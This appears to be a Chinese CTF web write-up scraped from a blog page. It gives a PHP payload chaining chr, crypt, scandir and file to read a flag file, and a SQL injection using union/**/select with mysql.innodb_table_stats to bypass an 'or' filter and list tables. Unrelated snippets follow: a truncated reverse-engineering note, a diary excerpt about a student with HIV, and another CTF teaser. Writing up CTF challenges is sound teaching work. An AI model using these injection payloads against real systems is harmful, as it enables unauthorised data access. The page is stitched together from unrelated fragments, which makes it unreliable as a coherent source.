這週做了一下,貼出做出來的web題。
?x='/th7s_is_flag');
flag
首先構造數字46
chr(next(ord(strrev(crypt(serialize(array())))));# 有概率得到46
chdir(next(scandir(chr(ord(strrev(crypt(serialize(array()))))))));#改變目錄
echo(implode(file(end(scandir(chr(ord(strrev(crypt(serialize(array()))))))))));#讀取檔案
把第二個和第三個合起來得到payload:
echo(implode(file(end(scandir(chr(ord(strrev(crypt(serialize(array(chdir(next(scandir(chr(ord(strrev(crypt(serialize(array())))))))))))))))))));
多訪問幾次就能getflag了
簡單檢視一下網頁,注入點應該在這
簡單fuzz一下,發現過濾了如下(可能不全)
我們使用如下語句可以檢視到資料庫版本,和庫名
這邊過濾了or,我們就不能使用imformation_schema了,但是這邊mysql的版本是5.6.46 ,有新特性,innodb_index_stats和 innodb_table_stats。
所以直接爆表
id=0' union/**/select * from (select 1)a join (select group_concat(table_name) from mysql.innodb_table_stats where database_name=schema())b join (select 3)c join (select version())d %23
結果如下
這下就很簡單了,無列名注入,直接出flag。
2018上海市大學生網路安全大賽 逆向 cpp
一道簡單的逆向,就是兩個函式加密,反著來一遍就行,不用爆破。for i 0 i for i 0 i 3 i usr bin env python coding utf 8 la 153,176,135,158,112,232,65,68,0x5,0x4,0x8b,0x9a,0x74,0xbc,0x5...
愛滋女大學生網路日記 摘錄
花開花落,每種花都有自己的花期,無論你對它給予多大的希望,它也會枯萎,也會凋謝。生命不也是如此嗎?不管花期長短?我們能做花叢中最艷的那枝就足夠了。用單純的眼光看世界,用真誠的心態和任何人交流,積極,樂觀的態度對待生活。病魔並不可怕,可怕的是你沒有健康的心態,真面生活的勇氣。人生事實上就是乙個大悲劇,...
第四屆上海大學生資訊保安比賽 web2
這道題目是一道 審計題 原始碼 題目思路是 變數覆蓋,反序列化漏洞 看到原始碼裡面有parse str 函式,這個函式如果沒有帶 array 這個引數,將會導致變數被重新賦值 過first 過 var a var give 過 bbb a var give 26bbb me 這裡用 26不能用 是因...